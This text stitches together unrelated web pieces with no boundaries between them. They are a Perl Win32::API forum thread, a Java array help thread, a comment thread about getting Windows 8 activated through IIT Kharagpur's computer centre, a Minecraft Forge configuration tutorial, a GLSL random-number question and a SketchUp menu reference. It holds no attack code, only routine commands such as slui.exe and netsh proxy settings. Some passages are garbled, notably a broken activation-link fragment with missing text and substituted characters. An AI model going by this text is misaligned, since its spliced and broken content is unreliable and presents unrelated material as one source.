#     or warn "\n ERROR: Can not import API:i2cGetDeviceAddress , $^E ,";
# So, I used INT. The following way is working for some other API but not this API :(

my $i2cGetDeviceAddressFunc = Win32::API->new('CrdI2C32', 'int i2cGetDeviceAddress()')
    or warn "\n ERROR: Can not import API:i2cGetDeviceAddress , $^E ,";
my $ret = $i2cGetDeviceAddressFunc->Call();

$ret = unpack ('C*', pack ("i", $ret));
print "\n $ret ";              # prints 152
$ret = sprintf ("0x%X", $ret);
print "\n $ret";               # prints 0x98 but I wanted 0x46
Update:
OS: Windows 7
Perl: Active Perl 5.12 , x86 flavour (MSWin32-x86-multi-thread)
UPDATE: Problem is solved.
The above code itself is fine. I was confused about the API call sequence. When I call the I2CWrite API and then i2cGetDeviceAddress, it provides the correct output (i.e. 70).
Thanks a lot to BrowserUk; his suggestion was useful for implementing some other APIs using Win32::API.
Thanks to tye for the $ret &= 0xFF; tip. I did not know about this, which is why I was using the complex pack & unpack.
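For anyone landing here later, a minimal sketch combining the int import with the low-byte mask (the DLL and function names are taken from the post above):
use Win32::API;

# Import with an int return type, then keep only the low byte,
# since the C function really returns an unsigned char.
my $getAddr = Win32::API->new('CrdI2C32', 'int i2cGetDeviceAddress()')
    or die "Can not import i2cGetDeviceAddress: $^E";

my $ret = $getAddr->Call();
$ret &= 0xFF;
printf "device address: %d (0x%X)\n", $ret, $ret;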
# So, I used INT , The following way is working for some other API but not this API :(
That should work.
Given this dll:
#include <stdio.h>
#include <stdlib.h>

__declspec(dllexport) unsigned char __stdcall getChar() {
    unsigned char c = (unsigned char)( rand() & 0xFF );
    printf( "Returning %d\n", c );
    return c;
}
This script:
#! perl -slw
use strict;
use Win32::API;
my $getChar = Win32::API->Import( 'junkdll', 'int getChar()' )
or die $!, $^E;
print getChar() for 1 .. 10;
Produces this output:
C:\test>t-w32api.pl
Returning 41
41
Returning 35
35
Returning 190
190
Returning 132
132
Returning 225
225
Returning 108
108
Returning 214
214
Returning 174
174
Returning 82
82
Returning 144
144
Not the most convenient form (numeric) to receive 'char' data, but you seem to want the numeric value anyway. You're just working too hard at trying to convert the value when there is no need to.
The start of some sanity?
Hi BrowserUk
For some reason, using 'int' and getting data from my DLL is not working.
We bought this from another company.
The one you have seems to be broken. What size is it? You probably need to send it back under warranty and exchange it for a new one.
Array question
John Powell
Greenhorn
Joined: Nov 13, 2004
Posts: 11
posted
Nov 20, 2004 19:23:00
I have a simple array that allows the user to enter integer values, then prints the value at each index of the array. Is it possible to restrict each index to a different integer? In other words, if the user enters the same integer more than once, it only gets stored once. Is this possible?
array[0] = 4
array[1] = 6
array[2] = 6 //doesn't get stored because it exists in [0], try again until unique
array[2] = 8
...etc for 20 unique values
import java.io.*;

class TestArray {
    public static void main(String[] args) throws IOException {
        int[] array = new int[20];
        BufferedReader inData = new BufferedReader(new InputStreamReader(System.in));
        for (int i = 0; i < array.length; i++) {
            System.out.println("Enter an integer: ");
            array[i] = Integer.parseInt(inData.readLine());
        }
        for (int i = 0; i < array.length; i++) {
            System.out.println("array [" + i + "] = " + array[i]);
        }
    }
}
Stan James
(instanceof Sidekick)
Ranch Hand
Joined: Jan 29, 2003
Posts: 8791
posted
Nov 20, 2004 20:12:00
With an array you'd have to compare each new number to all of the existing numbers to see if the new one is already there. You could give the user a message and let them try again. So if they were supposed to enter 10 numbers it might take them 15 tries to get the idea that they have to be unique. Is that how you'd picture the program working?
If you're allowed to explore beyond array, look at the JavaDoc for Collection, List and Set. There is one there you'll like.
A good question is never answered. It is not a bolt to be tightened into place but a seed to be planted and to bear more seed toward the hope of greening the landscape of the idea. John Ciardi
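A rough sketch of that Set-based approach (names are illustrative); add() returns false when the value is already present, so duplicates are easy to detect:
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.LinkedHashSet;
import java.util.Set;

class UniqueInput {
    public static void main(String[] args) throws IOException {
        Set<Integer> values = new LinkedHashSet<Integer>();
        BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
        while (values.size() < 20) {
            System.out.println("Enter an integer: ");
            int n = Integer.parseInt(in.readLine());
            // add() returns false if the value was already entered
            if (!values.add(n)) {
                System.out.println(n + " was already entered, try again.");
            }
        }
        System.out.println(values);
    }
}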
Mike Gershman
Ranch Hand
Joined: Mar 13, 2004
Posts: 1272
posted
Nov 20, 2004 20:16:00
I assume you know how to replace the for loop with a while or do loop.
In that loop, put an inner loop that searches the exising elements for a duplicate value. If one is found, set a boolean "duplicate" true and break out of the inner loop.
In the outer loop, if duplicate is true, display an error message instead of inserting an array element and incrementing the array index.
Give this a try. If you have a problem, post your code and we'll help.
[ November 20, 2004: Message edited by: Mike Gershman ]
Mike Gershman
SCJP 1.4, SCWCD in process
Preetham Chandrasekhar
Ranch Hand
Joined: Nov 05, 2003
Posts: 98
posted
Nov 20, 2004 20:35:00
Won't Sets solve your problem? They won't allow duplicate values to be entered; if you add a value that's already there, the set simply stays as it is.
Preetham
"In theory, there is no difference between theory and practice. But, in practice, there is."<br /> - Jan L.A. van de Snepscheut
John Powell
Greenhorn
Joined: Nov 13, 2004
Posts: 11
posted
Nov 21, 2004 16:38:00
Further problems:
I've expanded the original program to read integer values from a file. There are 20 unique values to be stored. In the file there can be multiple instances of each integer (although they will be between 5 and 24). The program should read off all values in the file. Once all values are read it will print off the value of each index and the number of times it appears in the file.
I'm having a hard time figuring out how to record the number of times a value occurs.
import java.io.*;
import java.util.*;

class arrays {
    public static void main(String[] args) throws IOException {
        int[] value = new int[20];
        int[] frequency = new int[20];
        int number = 0;
        String filename = "test.txt";

        //create array of 20 integers: 5 - 24.
        for (int i = 0; i < 20; i++) {
            value[i] = i + 5;
        }

        BufferedReader in = new BufferedReader(new FileReader(filename));
        String s = new String();
        StringTokenizer st;
        while ((s = in.readLine()) != null) {
            for (int i = 0; i < 100; i++) {
                st = new StringTokenizer(s);
                number = Integer.parseInt(st.nextToken());
                frequency[number]++;
            }
        }

        for (int i = 0; i < frequency.length; i++) {
            System.out.println("array [" + i + "]" + "= " + value[i] + " occurs " + frequency[i] + " times");
        }
    }
}
Michael Dunn
Ranch Hand
Joined: Jun 09, 2003
Posts: 4632
posted
Nov 21, 2004 16:52:00
if the values are between 5 and 24, just create an array
int[] fileNumber = new int[25];
then, when you read in each number from the file
int number = [number read in from file, converted to int];
fileNumber[number]++;
at the end, loop through fileNumber[] looking for values > 0
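Putting that suggestion into code, a sketch could look like this (test.txt and the 5-24 range come from the earlier post):
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.util.StringTokenizer;

class Frequencies {
    public static void main(String[] args) throws IOException {
        int[] count = new int[25];   // values are between 5 and 24
        BufferedReader in = new BufferedReader(new FileReader("test.txt"));
        String line;
        while ((line = in.readLine()) != null) {
            StringTokenizer st = new StringTokenizer(line);
            while (st.hasMoreTokens()) {
                int n = Integer.parseInt(st.nextToken());
                count[n]++;          // tally each number as it is read
            }
        }
        in.close();
        for (int i = 5; i < count.length; i++) {
            System.out.println(i + " occurs " + count[i] + " times");
        }
    }
}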
I agree. Here's the link:
×3. (the 0×3 is important)
- Tap or click the Slui.exe 0× :
damnn useful!!
Does anyone got successful key from CIC ? if yeas then please tell procedure for tht.
Many thanks
As specified in the post, You can get it in person from CIC.
please specify email address of CIC person
is it open for all Indian residents ? or only for student who in campus ?
Only for students in Campus. Infact, the key would work with Institute LAN only.
CIC is providing activation key for free????
To Specific versions of Windows, yes!
does anyone know the emailid of cic
For obvious concerns, I can’t give the E-mail ID here, If you are a resident of IIT Kharagpur, visit CIC at the earliest.
please tell the email-id of cic .
For obvious concerns, I can’t give the E-mail ID here, If you are a resident of IIT Kharagpur, visit CIC at the earliest.
Can you tell me, how do I do the same from ubuntu?
Ubuntu is free, you don’t need to activate it using licensed key.
am already having windows 8 installed on my PC,but its fake……
do i need a fresh installation or just the key will work???
It would only on the ISOs available on CIC Software Repository.
Where/What is CIC?
Computer and Informatics Center, IIT Kharagpur
can i have email of CIC???
For obvious concerns, I can’t give the E-mail ID here, If you are a resident of IIT Kharagpur, visit CIC at the earliest.
what is the CIC email id
can i know whom to meet in cic
Go there and ask about the Windows Product key, they will guide you.
@theDroidMaster
I followed the instruction but the repository takes a lot of time so search DC with the same name and got the 64 bit win 8 file..Now I’m trying to mount the image with Daemon Tool but its saying can’t copy file because its corrupt..Do you have the file with u? Please help
Since many users were downloading yesterday, the server was slow. Try it now through Software Repo, I am getting a good 8 MBPS now.
Can I visit CIC any time to get the key? Do I need to bring the ID card as well?
Visit during office hours.
hi i am not able to access the software repo by the process u have said the error message is
WINDOWS CANT ACCESS \\144.16.192.212
Check your network settings. Its working fine on my end.
What exactly could be the problem, in the network settings..
I myself am also not able to access it. Getting the same error.
can i update
Are you able to download apps from Microsoft Store in the Metro UI mode? I guess there are some issues when we try to do it over proxy..
I have found a way to downoad apps using our proxy. Will be posting an article regarding the same by tomorrow.
Thank You !!!
Slui.exe 0×3 is not opening ??
Type 0x3 instead of 0×3… replace the cross sign with an 'x' from the keyboard.
Is it only for student who in campus ?
Yes
after creating bootable files on pendrive , where to click??
Boot your computer with your pendrive.
Thanks……….i have upgraded it.
for those who cannot open store..
Open command prompt as admin and write:
netsh
winhttp
import proxy source=ie
now click enter..
this worked for me
We can run the apps by using:
netsh winhttp import proxy ie
Can you please clarify one thing:
Do I need to run the same commands as mentioned above (after first disabling proxy in internet explorer) to disable app-proxy when I go home and use my home’s proxy-free wifi ?
To remove the system proxy use this
netsh winhttp reset
Thanks :)
are they providing license for microsoft visual studio registered version?
Yeah.
I have installed the windows 8 and it working properly.. thanks… my doubt is will it work outside campus without any problem…????
It will work fine. :)
Hi
i am now using window8.
But it didn’t asked for ACT KEY during booting.
Will it ask for KEY in future?
Thanks a lot
Check point 4. Activating Windows in the article.
in cic file list they have matlab 2012. is that registered version is for KGP students also?
cannot activate..displaying multiple activation key has exceeded its limit
Well, it is what it is then.
if that is the situation…will we get another key from institute..or not..i have installed windows 8 but did not activate it..what should i do know???
As far as I know, the Key to 64 bit versions have reached the limit. You can try 32 bit or ask CIC people for any solution.
I changed my OS to windows 8 after downloading from CIC and getting the serial key from there…. but now when i use that to activate the windows… it says that it cant be activated and that “The activation server has reported that the multiple activation key has exceeded its limit” …. somebody please help… :(
As far as I know, the Key to 64 bit versions have reached the limit. You can try 32 bit or ask CIC people for any solution.
Yeah Getting the same probloem….multiple activation key has exceeded its limit…What can be done in this case?
its replying that it multiple activation key has exceeded its limit
I have Windows vista basic genuine in my laptop. Can I install M S office 2010? Will it be compatible?
Yes , you can install MS office 2010 .
Hey has anyone done this recently??? Is it still showing “multiple activation key has exceeded its limit” or are we getting other key or some other way out by CIC???
i installed fifa13 and nfs on my windows8 pc but these games are not working. when i try to open a game it shows ” no apps are installed to open this type of link(origin)”. any solution for this problem?
I am getting an error when I am trying to activate it.. it is saying “windows couldnt be activated, the file name, directory name or label syntax is incorrect”. now what is that? plz tell me
try windows activation via phone.. that works :)
Great and interesting articles it is nice info in this post.
[1.6.2] Minecraft Forge Modding #8 - Configuration File and Mod Distribution
Hey, guys, and welcome to Tutorial #8 of my Minecraft Forge modding series. In the last tutorial, I showed you how to make an omni-tool with the functionality of the four existing in-game tools.
In this tutorial, I am going to show you how to set up a Configuration file which will handle all our IDs, which will allow users of our mod to alter the IDs should we/they run into any ID conflicts with other mods. I will also be explaining to you how to package your mod into a distributable file, which can be run inside of the Minecraft client.
The first thing we are going to want to do is head into our Ids class file. There are currently three integers in this class; tutItem, tutTool and tutBlock. We are going to need to delete all three of these and start again. Each item is now going to have two integers related to it; a default value and an actual value. To do this, we need to make, obviously, two integers per ID:
package tutorial.lib;

public class Ids {
    public static int tutItem_actual;
    public static final int tutItem_default = 16000;

    public static int tutTool_actual;
    public static final int tutTool_default = 16001;

    public static int tutBlock_actual;
    public static final int tutBlock_default = 3000;
}
We will now get errors inside of our Items and Blocks class files. This is fine; we simply need to change their values ("tutBlock" needs to be renamed "tutBlock_actual" in the Blocks class and "tutItem" and "tutTool" need to be renamed "tutItem_actual" and "tutTool_actual" in the Items class).
Our Blocks class should now look like this:
package tutorial.blocks;

import cpw.mods.fml.common.registry.GameRegistry;
import cpw.mods.fml.common.registry.LanguageRegistry;
import net.minecraft.block.Block;
import tutorial.lib.Ids;
import tutorial.lib.Names;

public class Blocks {
    public static Block block;

    public static void init() {
        block = new TutBlock(Ids.tutBlock_actual);
        GameRegistry.registerBlock(block, Names.tutBlock_name);
    }

    public static void addNames() {
        LanguageRegistry.addName(block, Names.tutBlock_name);
    }
}
And our Items class should look like this:
package tutorial.items;

import net.minecraft.item.EnumToolMaterial;
import net.minecraft.item.Item;
import net.minecraftforge.common.MinecraftForge;
import tutorial.lib.Ids;
import tutorial.lib.Names;
import cpw.mods.fml.common.registry.LanguageRegistry;

public class Items {
    public static Item item;
    public static Item tool;

    public static void init() {
        item = new TutItem(Ids.tutItem_actual);
        tool = new TutTool(Ids.tutTool_actual, EnumToolMaterial.EMERALD);
    }

    public static void addNames() {
        LanguageRegistry.addName(item, Names.tutItem_name);
        LanguageRegistry.addName(tool, Names.tutTool_name);
    }
}
However, if we try to run the client now, we will get a crash because all three IDs are trying to use the same value. Why is this? Well, because we have not linked the actual value with the default value.
To do this, we are going to need to create a new class, which I am going to put inside my lib package, called "ConfigHandler". We are going to use our config handler to create a new ".cfg" file, which the mod user can use to alter the IDs of the blocks/items in your mod.
To do this, our init constructor inside of the ConfigHandler class is going to have to have a condition; a file:
package tutorial.lib;

import java.io.File;

public class ConfigHandler {
    public static void init(File configFile) {
    }
}
We are then going to have to call upon an existing class called "Configuration" which we are going to use to save and load any edited IDs (or initial IDs upon first use):
package tutorial.lib;

import java.io.File;
import net.minecraftforge.common.Configuration;

public class ConfigHandler {
    public static void init(File configFile) {
        Configuration config = new Configuration(configFile);
    }
}
We can now use our "config" parameter to save and load the IDs:
config.load();
config.save();
This means that our ConfigHandler class should currently look like this:
package tutorial.lib;

import java.io.File;
import net.minecraftforge.common.Configuration;

public class ConfigHandler {
    public static void init(File configFile) {
        Configuration config = new Configuration(configFile);
        config.load();
        config.save();
    }
}
Obviously, our ConfigHandler class is not registering any IDs yet, but it also will not be loaded as we have not added it to our main mod class (Tutorial). To do this, go to the Tutorial class file and, inside of the preInit constructor, we need to load the ConfigHandler:
@EventHandler
public static void preInit(FMLPreInitializationEvent event) {
    ConfigHandler.init(event.getSuggestedConfigurationFile());
}
We are now calling our ConfigHandler class inside of our preInit constructor. When it creates our config file, it will create it as the "suggested configuration file", which means it can be found inside the "config" folder of your .minecraft (or inside the "jars" folder inside the "mcp" folder in the case of running it in Eclipse) and will be called "<ModInfo.ID>.cfg".
Now we can register our IDs with our ConfigHandler. All of the IDs that we want to register need to be put between the "config.load()" and "config.save()" methods. We can also load Strings and booleans inside of our ConfigHandler, but we are only interested in IDs since this is all we have created.
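As an aside, if I remember the 1.6-era Configuration class correctly, other value types follow the same pattern through config.get(...); the property names below are invented, so double-check the exact method signatures against your Forge version:
// Inside ConfigHandler.init, between config.load() and config.save():
boolean enableDebug = config.get(Configuration.CATEGORY_GENERAL,
        "enableDebugMessages", false).getBoolean(false);
String greeting = config.get(Configuration.CATEGORY_GENERAL,
        "worldLoadGreeting", "Hello from the tutorial mod!").getString();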
First, we are going to register our tutBlock's ID:
Ids.tutBlock_actual = config.getBlock(Names.tutBlock_name, Ids.tutBlock_default).getInt();
What the code is doing is getting an integer that connects the tutBlock_actual with another value (in this case, tutBlock_default). When you open the config file (after you have run the mod), you will see a line that will say:
I:"Tutorial Block"=3000
This means that the user can now alter the ID and avoid any ID conflicts with other mods. We are going to do a similar thing with the IDs for tutItem and tutTool:
Ids.tutItem_actual = config.getItem(Names.tutItem_name, Ids.tutItem_default).getInt() - 256;
Ids.tutTool_actual = config.getItem(Names.tutTool_name, Ids.tutTool_default).getInt() - 256;
The only difference between registering block IDs and item IDs is that item IDs are shifted by +256 (so, if you tell it an ID of 10000, it will actually use an ID of 10256). I'm not entirely sure why it does this, but it is a vanilla feature so cannot be stopped. To get around the problem, we simply reduce the integer that the ConfigHandler finds by 256 so that the ID we tell it is the ID that it uses.
Our finished ConfigHandler should now look like this:
package tutorial.lib;

import java.io.File;
import net.minecraftforge.common.Configuration;

public class ConfigHandler {
    public static void init(File configFile) {
        Configuration config = new Configuration(configFile);
        config.load();
        Ids.tutBlock_actual = config.getBlock(Names.tutBlock_name, Ids.tutBlock_default).getInt();
        Ids.tutItem_actual = config.getItem(Names.tutItem_name, Ids.tutItem_default).getInt() - 256;
        Ids.tutTool_actual = config.getItem(Names.tutTool_name, Ids.tutTool_default).getInt() - 256;
        config.save();
    }
}
If you now run the client, the game will run normally and you can find the configuration file in "mcp/jars/config".
The final thing that I am going to show you how to do in this tutorial is package your mod for release to the general public. For this, we are going to need to leave the Eclipse workspace (you do not need to close Eclipse) and head on over to the "mcp" folder.
Inside of the "mcp" folder, there are a variety of Windows Batch Files and SH Files. Windows users should, obviously, use the Batch Files, whereas Mac users should use the SH Files.
The first file we are going to want to run is called "recompile". This will, as the name suggests, recompile the source code (the .java files) into .class files.
This will take a few moments to run and recompile the code. Ignore the warning that says "!! Can not find server sources, try decompiling !!" and close the window.
Once the code has been recompiled, we will then need to run the file called "reobfuscate". The "reobfuscate" file will search through the newly recompiled Minecraft source code and identify any .class files that are new (i.e. not in the vanilla Minecraft source code). It will then extract these .class files and put them inside the folder called "reobf".
Once the "reobfuscate" file has completed, open the "reobf" folder inside the "mcp" folder. There will be another folder called "minecraft"; you should open this too. Inside of the "minecraft" folder, there will be a folder with the first part of our mod's package name (for example, "tutorial"). If you open the "tutorial" folder, you will find all of our packages and .class files.
Copy this "tutorial" folder to a separate location. We are going to need to add this folder to a .zip or .jar file. We then need to go back to our "mcp" folder and head into the "src" folder. Go into the "minecraft" folder and then copy the folder called "assets". The "assets" folder also needs to be added to the .zip/.jar file.
Your mod is now ready for public release. The user simply needs to drop the .zip/.jar file into their "mods" folder and they can use your mod.
End of Tutorial
This is the end of Minecraft Forge Modding #8 - Configuration File and Mod Distribution. In this tutorial, we have made a configuration file that allows mod users to change the IDs of our blocks and items if they encounter an ID conflict (or feel like changing the ID for fun). We have also packaged our mod into a .zip/.jar file ready for distribution to the Minecraft audience.
The next few tutorials are going to be utility-related (for example, adding an mcmod.info file and using a LogHelper to print messages to the console). This is because I am starting to begin writing some advanced tutorials using TileEntities, Containers and GUIs to create a custom chest and a custom furnace. Feel free to head on over to the "Advanced Tutorials" page of my website (link can be found here) to follow along with them; however, be warned, they are going to be long multi-part tutorials that will take a while for me to write and upload, so please be patient with them.
I hope this tutorial has been useful and, as always, I'll see you in the next one.
~MrrGingerNinja
View the previous tutorial (Tutorial #7 - Creating an Omni-Tool) here
View the next tutorial (Tutorial #9a - Utility Part 1: mcmod.info) here
I've been (re)searching for a prng on the web. I came up with the following (excuse my syntax -- I'm a newbie in shading):
A few depending on bitwise operations:
1.
It supposedly returns normalized values.
Code :
#extension GL_EXT_gpu_shader4: enable
float rnd(vec2 v)
{
    int n = int(v.x * 40.0 + v.y * 6400.0);
    n = (n << 13) ^ n;
    return 1.0 - float( (n * (n * n * 15731 + 789221) + 1376312589) & 0x7fffffff) / 1073741824.0;
}
2.
Code :
#extension GL_EXT_gpu_shader4: enable
int LFSR_Rand_Gen(int n)
{
    n = (n << 13) ^ n;
    return (n * (n*n*15731+789221) + 1376312589) & 0x7fffffff;
}
This belongs to George Marsaglia (hope I've written the code right):
3.
Code :
#extension GL_EXT_gpu_shader4: enable
int rando(ivec2 p)
{
    p.x = 36969*(p.x & 65535) + (p.x >> 16);
    p.y = 18000*(p.y & 65535) + (p.y >> 16);
    return (p.x << 16) + p.y;
}
There is also xorshift (), but it uses static vars.
I can't enable the appropriate extension in my software. I didn't want it anyway as I like to keep things simple. And I don't want such a large period / perfect distribution, either.
Here's one of unknown origin which looks suspicious due to the sin() for which reason I'll refrain from using it, namely "one-liner":
4.
Code :
float rand(vec2 co)
{
    return fract(sin(dot(co.xy, vec2(12.9898, 78.233))) * 43758.5453);
}
and finally, the most fitted prng for myself that I found was (*rolling drums*):
Lehmer random number generator, which accepts different setup values from which I chose:
5.
Code :
int lcg_rand(int a)
{
    return (a * 75) % 65537;
}
The trouble with this last prng (and not only) is that the returned value must be saved as the seed for the next call.
So, how can it be saved? Is there a static qualifier or some workaround, so the function could be called from within the fragment shader and each subsequent call to set the "static" seed for the next?
OR
Does anybody know of a fast short prng which pops the random number based on, say, one of the texCoord floats?
Or any other ideas?
The whole idea is to generate fast 1D / 2D noise in under 10 lines of code.
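For what it's worth, here's one possible stateless sketch that derives a value in [0,1) purely from the incoming coordinate, so nothing has to be stored between calls; the constants are arbitrary, and it assumes the old gl_TexCoord/gl_FragColor built-ins:
// Per-fragment hash "noise", no state and no integer extensions needed
float hashNoise(vec2 p)
{
    p = fract(p * vec2(443.897, 441.423));
    p += dot(p, p.yx + 19.19);
    return fract((p.x + p.y) * p.x);
}

void main()
{
    float r = hashNoise(gl_TexCoord[0].xy * 1024.0);
    gl_FragColor = vec4(vec3(r), 1.0);
}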
Google SketchUp: The Missing Manual gives you all the
details, explanations, and examples you need to create awesome 3-D models in
SketchUp. This appendix provides quick thumbnail descriptions of every command in
every menu..
Many of the menu commands have multiple keyboard shortcuts. Each command in
this list shows the available shortcuts for Windows and Mac systems. When more
than one command is available, they're separated by a semicolon (;).
The File menu commands work on your SketchUp
documents as a whole. Use the File menu for major events like starting a new
project, opening a file you created previously, and shutting down SketchUp when
you're finished working.
Windows: Ctrl+N
Mac: ⌘-N
The New command opens a new SketchUp document, the proverbial clean slate.
On Windows computers if you have a document already open, SketchUp prompts
you to save the current document before opening a new one. If you need to
open more than one SketchUp document in Windows, start SketchUp a second
time and then open the second file. Macs let you open more than one document
at a time by simply creating new windows.
Windows: Ctrl+O
Mac: ⌘-O
Opens the standard window where you can navigate through your folders and
open SketchUp files. Use Open to quickly find and
open SketchUp documents. See New for ways to open more than one SketchUp
document at a time. The techniques are different for Windows and Mac.
Displays a submenu that lists SketchUp files that were recently opened.
Click any file to reopen it. (For Windows, see Recent Files.)
Windows: Ctrl+S
Mac: ⌘-S
Saves the changes that you've made to your SketchUp document. In Windows,
if you haven't made any changes in the document, the command is dimmed. If
you haven't yet saved the document, the command works like Save As, described next.
Mac: Shift-⌘-S
Saves the current document with a new name, or in a previous SketchUp file
format such as SketchUp 5 or SketchUp 6. After choosing the command, you see
a standard window where you can navigate to a different folder and type in a
new name. When SketchUp is done saving, the document is still open, but has
the new name.
Saves the current document with a new name similarly to Save As. When the
save finishes, the current document is still open in SketchUp and has the
original file name.
Discards any changes you made to the document since the last save. Revert
is handy when you decide you've gone down the wrong path and just want
things the way they were when you started.
Exports the current SketchUp document to the LayOut program (the section called “Workflow for a LayOut Project”). LayOut is only available in
SketchUp Pro and provides features for producing detailed documents from
SketchUp models.
Gives access to the 3D Warehouse, Google's web-based site where the
SketchUp community can share models. Why reinvent the wheel when you can
download it from the 3D Warehouse? At the warehouse, you find complete
buildings and building components like doors and windows from major
manufacturers. Furniture, appliances, and non-architectural models like
cars, airplanes, and animals are also available. You may be surprised at
what you'll find at the 3D Warehouse. Into Elvis Presley? You can download
the Graceland mansion and models of Elvis himself.
Exports your SketchUp model to different 2-D and 3-D file formats. The 2-D formats—like
JPG, TIFF, and PDF—create images based on the current view in the
modeling window. The free SketchUp program only exports to one 3-D format:
the .kmz file format used by Google Earth. SketchUp Pro exports to several
other formats, including standard AutoCAD formats such as .dxf and .dwg. You
can also use this command to export animations and section slices.
Imports 2-D and 3-D files into SketchUp for modeling, for Photo Match, or
to use as raw material for creating a new SketchUp model.
Opens the standard Windows Print Setup window, where you choose your
printer, paper size, and page orientation.
Leads to the Print Preview window, where you can adjust print settings
including scale. Click OK to see a preview. From the Print Preview, you can
print the image or return to SketchUp.
Mac: Shift-⌘-P
Leads to a standard Mac panel where you set printer options including page
size, page orientation, and the printing scale in percentage.
Leads to a panel where you can adjust the print size and print scale for
the document. Perspective view cannot create scalable documents, so you must
set the view to Parallel Projection (Camera → Parallel
Projection).
Windows: Ctrl+P
Mac: ⌘-P
Displays the standard Print window, where you choose a printer and the
number of copies you wish to print.
Creates an attribute report for Dynamic components.
Windows computers display a list of recently opened SketchUp documents on
the File menu. To open a document, click the
name.
Windows: Alt+F4
Mac: ⌘-Q (found on the SketchUp menu)
Stops the program and then closes the SketchUp window. If documents are
open, SketchUp closes them. If documents are unsaved, the program prompts
you to save them before quitting.
Mac programs have a standard menu under the program name. These menus access
basic services and preferences.
Displays a box that lists the version number for SketchUp and web links to
help and license details.
Displays license details for SketchUp Pro. This option is grayed out on
the free version of SketchUp.
Checks the Google SketchUp website to determine if you're running the most
recent version of SketchUp. A window displays the search results.
Leads to standard Mac services like Finder, Disk Utility, and Font Book.
You can customize the options on this list through the Mac operating
system.
⌘-H
Hides the SketchUp menu and window so you can view
other objects on your computer desktop.
Option, ⌘-H
Hides all programs except SketchUp.
Displays the windows of all currently running programs.
⌘-Q
Quits SketchUp. If documents have unsaved changes, the program prompts you to save them before quitting.
This menu holds the standard Cut, Copy, and Paste commands as well as several
specific commands that work with SketchUp components and groups.
Windows: Ctrl+Z
Mac: ⌘-Z
This command undoes the last command you applied. So if you accidentally
delete an edge or face in the modeling window, the Undo command brings it
back like magic. Remember Undo for those moments when you smack your head
and say "Oh no! Why'd I do that?" SketchUp keeps track of your actions
sequentially, so you can use multiple Undo commands to backtrack through
your recent actions. Most actions can be undone, but a few—like the
deletion of a scene—can't be undone.
Windows: Ctrl+Y
Mac: Shift-⌘-Z
Redo lets you undo an Undo command. If you undo an action or a command and
then decide that you preferred it before the Undo, use the Redo command to
get back to square one. You can use multiple Undos and Redos to move back
and forth through your recent SketchUp activities.
Windows: Ctrl+X
Mac: ⌘-X
Removes the selected entity (or entities) from the modeling window, and
places a copy of it on your computer's Clipboard. Once it's on the
Clipboard, you can paste it back into the modeling window.
The term entity refers to any selectable object
in SketchUp. An entity can be a single edge, a face, or a complex group
or component.
Windows: Ctrl+C
Mac: ⌘-C
Copies a selected entity (or entities) and places the copy on the
Clipboard. The original entity stays in place. Using this command, you can
copy and paste entities from one SketchUp document into another.
Windows: Ctrl+V
Mac: ⌘-V
Attaches a copy of an entity (or entities) stored on the Clipboard to the
Move tool. Click a location to paste the entity in the modeling window. If
you decide not to complete the paste action, press Esc or choose another
tool.
Pastes a copy of entities on the Clipboard back into position using the
same XYZ coordinates as the original. This command is particularly useful
for moving entities into or out of groups and components.
Windows:
Mac:
Removes selected entities from the modeling window. Unlike Cut, Delete doesn't put the entity on the Clipboard, and you can't paste it back into the window.
You can use Undo immediately after Delete to bring back something you
deleted.
Guides are dashed lines used for measurement and alignment. When you're
ready to create an animation or to print images from your model, you can use
this command to remove the guide lines.
Windows: Ctrl+A
Mac: ⌘-A
Selects all entities in the modeling window.
Windows: Ctrl+T
Mac: Shift-⌘-A
Removes the selection from all currently selected objects. SketchUp
builders often simply click an empty space in the modeling window to
deselect everything. Use Select None to make absolutely sure nothing is
selected.
Mac: ⌘-E
Hides any selected entities from view in the modeling window. This command
doesn't erase or delete the entities; you can make them visible with the
Unhide command (next).
Makes hidden entities visible again. (See the previous command.) So how do
you see and select a hidden object? If it's a group or a component, you can
use the Outliner to select the hidden object. Otherwise you can use the View
→ Hidden Geometry command to make entities visible and selectable.
They're still considered hidden until you use the Unhide command. The Unhide
command has three submenu options:
Unhides entities that are selected using one of the techniques
described in the previous paragraph.
Unhides the last entity that was hidden. The entity doesn't have to be
selected.
Mac: Shift-⌘-E
Unhides all the hidden entities in the modeling window. The entities
don't have to be selected.
Locks groups and components. You can't move locked groups and components
until you unlock them (next).
Unlocks groups and components that have been locked using Lock
Windows: G
Mac: Shift-⌘-G
Collects the selected entities and saves them in a SketchUp component.
Components appear in the Components window, and you replicate them by
creating new instances. All instances created from a single component are
identical. (See the section called “Creating a Group” for more detail on groups
and components.)
Mac: ⌘-G
Saves the collected entities in a group. Groups don't appear in the
Components window. (See the section called “Creating a Group” for more on
groups and components.)
Mac: Ctrl-Shift-⌘-G
Closes an open group or component. (Groups and components must be
opened—by double-clicking, for example—to be edited.)
In SketchUp, entities (like a rectangle and a cone) can pass through each
other without cutting through any of the other faces. Unlike in the real
world, they can occupy the same face. When you want to change that behavior,
you create shared edges by using the Intersect commands. The way faces and
entities intersect with each other is important in SketchUp: It determines
the way the entities behave and the way they can be manipulated. The
Intersect command automates the process of creating shared edges. To use the
Intersect commands, select an entity and then choose one of the three
submenu options:
Creates intersections where other entities overlap the current
selection.
Creates intersections among the entities included in the
selection.
Creates intersections between two entities within the current context
(in the same group or component) and excludes entities outside of the
context.
This menu and its submenu options show
commands related to the currently selected entities. You can see many of
these same options in a shortcut menu by right-clicking selected entities.
If a single face or edge is selected, the name on the menu changes to "edge"
or "face". If several edges and faces are selected (but aren't in a group or
component), you see something like "5 Entities". When a group or component
is selected, you see "group" or "component" as the menu name. The options
displayed in the submenu change depending on the selection.
Selects other entities with another submenu showing these options:
Connected Faces, All Connected, or "All on Same Layer".
Smoothes the angles formed where faces meet at an edge.
Divides a single edge into multiple edges. After selecting the
command, type a number and press Enter (Return on a Mac).
Changes the view so the selected edge fills the modeling window and is
entirely within the window.
Selects other entities with another submenu showing these options:
Bounding Edges, Connected Faces, All Connected, "All on Same Layer", and
"All with Same Material".
Using submenus, this command calculates the surface area covered by a
face, covered by a specific material, or in the current layer. The
result appears in the Measurements toolbar.
Creates intersections between the face and other entities in the
model. For more on intersections see the section called “Intersections in 3-D Objects”.
Aligns the SketchUp camera to point toward the currently selected
face.
Repositions the axes relative to the selected face.
Reverses the inside/outside orientation of the faces. Using the
standard face colors, white faces (front faces) become blue, and blue
faces (back faces) become white.
